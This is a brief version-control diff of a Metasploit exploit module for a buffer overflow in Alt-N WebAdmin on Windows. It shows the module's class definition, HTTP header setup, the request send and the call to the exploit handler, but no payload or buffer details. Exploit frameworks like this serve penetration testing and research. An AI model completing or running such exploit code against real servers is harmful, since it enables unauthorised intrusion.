git-svn-id: file:///home/svn/incoming/trunk@3398 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-01-17 01:11:10 +00:00
parent da81906949
commit b9bdd96f97
1 changed files with 2 additions and 1 deletions

View File

@ -4,7 +4,7 @@ module Msf
class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
@ -66,6 +66,7 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
req.headers['Accept-Language'] = 'en'
req.headers['Accept-Charset'] = 'iso-8859-1,*,utf-8'
print_status("Sending request...")
res = c.send_request(req)
handler